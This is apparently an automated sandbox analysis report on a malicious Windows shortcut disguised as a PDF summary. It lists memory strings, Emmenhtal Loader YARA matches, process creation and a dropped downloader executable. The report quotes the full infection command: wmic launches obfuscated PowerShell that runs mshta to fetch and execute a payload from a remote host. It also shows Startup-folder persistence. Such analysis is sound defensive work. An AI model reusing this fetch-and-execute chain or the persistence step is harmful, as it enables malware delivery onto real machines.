        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-C
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CL
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.e
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.ex
        Source: powershell.exe, 00000007.00000002.1757475272.000001F40BFBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
        Source: mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCBC000.00000004.00000020.00020000.00000000.sdmp, HateSpeech2024_Summary.pdf.lnk.bin.lnkString found in binary or memory: https://myfilebuilders.com/samm
        Source: powershell.exeString found in binary or memory: https://myfilebuilders.com/samm$global:?
        Source: mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm(
        Source: mshta.exe, 00000005.00000003.1839341806.000001EB13B24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1847325964.000001EB13B24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840509562.000001EB13B24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1892727131.000001EB13B45000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1847566039.000001EB13B27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1848089954.000001EB13B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm(Z
        Source: mshta.exe, 00000005.00000002.1888475276.000001E30CC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm-0
        Source: mshta.exe, 00000005.00000002.1889780007.000001EB0EF7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm...1i
        Source: mshta.exe, 00000005.00000003.1885898533.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1841817928.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883693311.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890206556.000001EB0F024000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1848758754.000001EB0F024000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm...X5
        Source: mshta.exe, 00000005.00000003.1839341806.000001EB13B24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1847325964.000001EB13B24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840509562.000001EB13B24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1892727131.000001EB13B45000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1847566039.000001EB13B27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1848089954.000001EB13B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm.U
        Source: mshta.exe, 00000005.00000002.1888475276.000001E30CC58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm/
        Source: mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm0
        Source: mshta.exe, 00000005.00000002.1888475276.000001E30CCA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm7
        Source: powershell.exe, 00000004.00000002.1653965522.000002A9CB6D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm;
        Source: powershell.exe, 00000004.00000002.1653812581.000002A9CB6C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm;.WSF;.WSH;.MS
        Source: mshta.exe, 00000005.00000002.1888475276.000001E30CC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammB
        Source: mshta.exe, 00000005.00000002.1888475276.000001E30CC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammC:
        Source: mshta.exe, 00000005.00000002.1888475276.000001E30CC58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammF
        Source: mshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammG
        Source: mshta.exe, 00000005.00000002.1889045951.000001E30E5E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammH
        Source: mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammI
        Source: mshta.exe, 00000005.00000002.1888475276.000001E30CC58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammL
        Source: mshta.exe, 00000005.00000003.1846315954.000001EB13BD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1847163890.000001EB13BD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1855774349.000001EB13BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1848132792.000001EB13BEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammLMEM
        Source: mshta.exe, 00000005.00000003.1843743882.000001EB0EFAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885688982.000001EB0EFAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1884092790.000001EB0EFAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1889989783.000001EB0EFAD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842138558.000001EB0EFA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1842172300.000001EB0EFAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammMMC:
        Source: powershell.exe, 00000004.00000002.1653965522.000002A9CB6D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammP
        Source: mshta.exe, 00000005.00000003.1840765627.000001EB1396A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840318424.000001EB1395B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840586133.000001EB13968000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1843470326.000001EB13999000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1891448776.000001EB139B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammR
        Source: mshta.exe, 00000005.00000002.1888633604.000001E30CCBF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samma
        Source: mshta.exe, 00000005.00000002.1888633604.000001E30CCBF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1840043057.000001E30CCBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammes
        Source: powershell.exe, 00000004.00000002.1654335033.000002A9CDA0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammh
        Source: mshta.exe, 00000005.00000003.1862801694.000001EB122D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1856590929.000001EB122D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammhttps://myfilebuilders.com/sammp
        Source: mshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammj
        Source: mshta.exe, 00000005.00000002.1893168939.000001EB14420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammjn
        Source: mshta.exe, 00000005.00000002.1888475276.000001E30CC30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammkCg
        Source: powershell.exe, 00000004.00000002.1654194592.000002A9CD080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammkE9
        Source: mshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammls
        Source: mshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammo
        Source: powershell.exe, 00000004.00000002.1654335033.000002A9CD561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/sammp
        Source: mshta.exe, 00000005.00000003.1841460930.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1846617746.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.1890030259.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1885298177.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883848292.000001EB0F00C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.1883290702.000001EB0F00A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myfilebuilders.com/samm~
        Source: powershell.exe, 00000007.00000002.1814428015.000001F41BB25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
        Source: svchost.exe, 00000006.00000003.1665256909.000001B97E512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
        Source: php.exeString found in binary or memory: https://www.php.net
        Source: php.exeString found in binary or memory: https://www.php.net/
        Source: php.exe, 00000018.00000002.2897155503.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmp, php.exe, 0000001C.00000002.2896806357.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.php.net/D
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmp, tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmp, php.exe, 00000018.00000000.2016752512.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp, php.exe, 0000001C.00000000.2188550672.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp, php_pdo_mysql.dll.21.dr, php_sysvshm.dll.21.dr, php_mysqli.dll.21.dr, php_zend_test.dll.21.drString found in binary or memory: https://www.php.netD

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], type: DROPPEDMatched rule: Emmenhtal Loader string Author: Sekoia.io
        Yara detected malicious lnk
        Source: Yara matchFile source: HateSpeech2024_Summary.pdf.lnk.bin.lnk, type: SAMPLE
        Contains functionality to create processes via WMI
        Source: WMIC.exe, 00000000.00000002.1636119414.000001DCDDE90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')"C:\Users\user\Desktop\HateSpeech2024_Summary.pdf.lnk.bin.lnkWinsta0\Defaultmemstr_74a538d7-a
        Found PHP interpreter
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CompanyNameThe PHP Group6
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: The PHP Group0
        Source: tar.exe, 00000015.00000003.2012701021.0000021721947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: PHP %s, Copyright (c) The PHP Group
        Source: tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CompanyNameThe PHP Group6
        Source: tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: The PHP Group0
        Source: tar.exe, 00000015.00000003.2013269823.000002172195E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: PHP %s, Copyright (c) The PHP Group
        Source: tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CompanyNameThe PHP Group6
        Source: tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: The PHP Group0
        Source: tar.exe, 00000015.00000003.2012847011.0000021721956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: PHP %s, Copyright (c) The PHP Group
        Source: php.exeString found in binary or memory: The PHP Group
        Source: php.exeString found in binary or memory: The PHP Group
        Source: php.exeString found in binary or memory: PHP %s (%s) (built: %s %s) (%s) Copyright (c) The PHP Group %s
        Source: php.exeString found in binary or memory: PHP %s (%s) (built: %s %s) (%s)Copyright (c) The PHP Group%s
        Source: php.exe, 00000018.00000000.2016752512.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: CompanyNameThe PHP Group0
        Source: php.exe, 00000018.00000000.2016752512.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: The PHP Group0
        Source: php.exe, 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: Copyright (c) The PHP Group
        Source: php.exe, 00000018.00000002.2897155503.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: CompanyNameThe PHP GroupV
        Source: php.exe, 00000018.00000002.2897155503.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: The PHP Group0
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: it under the terms of the PHP License as published by the PHP Group
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: it under the terms of the PHP License as published by the PHP Group
        Source: php.exe, 00000018.00000002.2896466367.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: This program is free software; you can redistribute it and/or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file: LICENSE
        Source: php.exe, 00000018.00000000.2016553083.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: Copyright (c) The PHP Group
        Source: php.exe, 0000001C.00000000.2188550672.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: CompanyNameThe PHP Group0
        Source: php.exe, 0000001C.00000000.2188550672.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: The PHP Group0
        Source: php.exe, 0000001C.00000002.2896806357.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: CompanyNameThe PHP GroupV
        Source: php.exe, 0000001C.00000002.2896806357.00007FFDF9E2C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: The PHP Group0
        Source: php.exe, 0000001C.00000000.2188454449.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: Copyright (c) The PHP Group
        Source: php.exe, 0000001C.00000002.2894997934.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: Copyright (c) The PHP Group
        Source: php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: it under the terms of the PHP License as published by the PHP Group
        Source: php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: it under the terms of the PHP License as published by the PHP Group
        Source: php.exe, 0000001C.00000002.2896212537.00007FFDF9C2B000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: This program is free software; you can redistribute it and/or modify it under the terms of the PHP License as published by the PHP Group and included in the distribution in the file: LICENSE
        Source: php_pdo_mysql.dll.21.drString found in binary or memory: CompanyNameThe PHP GroupR
        Source: php_pdo_mysql.dll.21.drString found in binary or memory: The PHP Group0
        Source: php_sysvshm.dll.21.drString found in binary or memory: CompanyNameThe PHP GroupV
        Source: php_sysvshm.dll.21.drString found in binary or memory: The PHP Group0
        Source: php_mysqli.dll.21.drString found in binary or memory: CompanyNameThe PHP Group6
        Source: php_mysqli.dll.21.drString found in binary or memory: The PHP Group0
        Source: php_zend_test.dll.21.drString found in binary or memory: CompanyNameThe PHP GroupL
        Source: php_zend_test.dll.21.drString found in binary or memory: The PHP Group0
        Powershell drops PE file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeJump to dropped file
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Windows shortcut file (LNK) contains suspicious command line arguments
        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnkLNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')"
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8920FA4_2_00007FFD9B8920FA
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E4514C12_2_00007FF658E4514C
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E4029012_2_00007FF658E40290
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E3924812_2_00007FF658E39248
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E43BFC12_2_00007FF658E43BFC
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E40D1C12_2_00007FF658E40D1C
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E3D48012_2_00007FF658E3D480
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E46D7C12_2_00007FF658E46D7C
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E41F0412_2_00007FF658E41F04
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E35E9A12_2_00007FF658E35E9A
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E3564412_2_00007FF658E35644
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E3A11012_2_00007FF658E3A110
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E4211012_2_00007FF658E42110
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeCode function: 12_2_00007FF658E3503812_2_00007FF658E35038
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FF7498C1B1024_2_00007FF7498C1B10
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FF7498C97D024_2_00007FF7498C97D0
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FF7498C633024_2_00007FF7498C6330
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeCode function: 24_2_00007FFE1A52777424_2_00007FFE1A527774
        Source: icudt71.dll.21.drStatic PE information: No import functions for PE file found
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3004
        Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3004Jump to behavior
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\samm[1], type: DROPPEDMatched rule: emmenhtal_strings_hta_exe author = Sekoia.io, description = Emmenhtal Loader string, creation_date = 2024-09-06, classification = TLP:CLEAR, version = 1.0, id = 64e08610-e8a4-4edd-8f6b-d4e8d2b47d87, hash = e86a22f1c73b85678e64341427c7193ba65903f3c0f29af2e65d7c56d833d912
        Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@45/150@0/3
        Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9168:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2128:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9088:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubirbunw.cvo.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs"
        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnkReversingLabs: Detection: 23%
        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnkVirustotal: Detection: 27%
        Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')"
        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://myfilebuilders.com/samm')
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://myfilebuilders.com/samm"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://myfilebuilders.com/samm
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
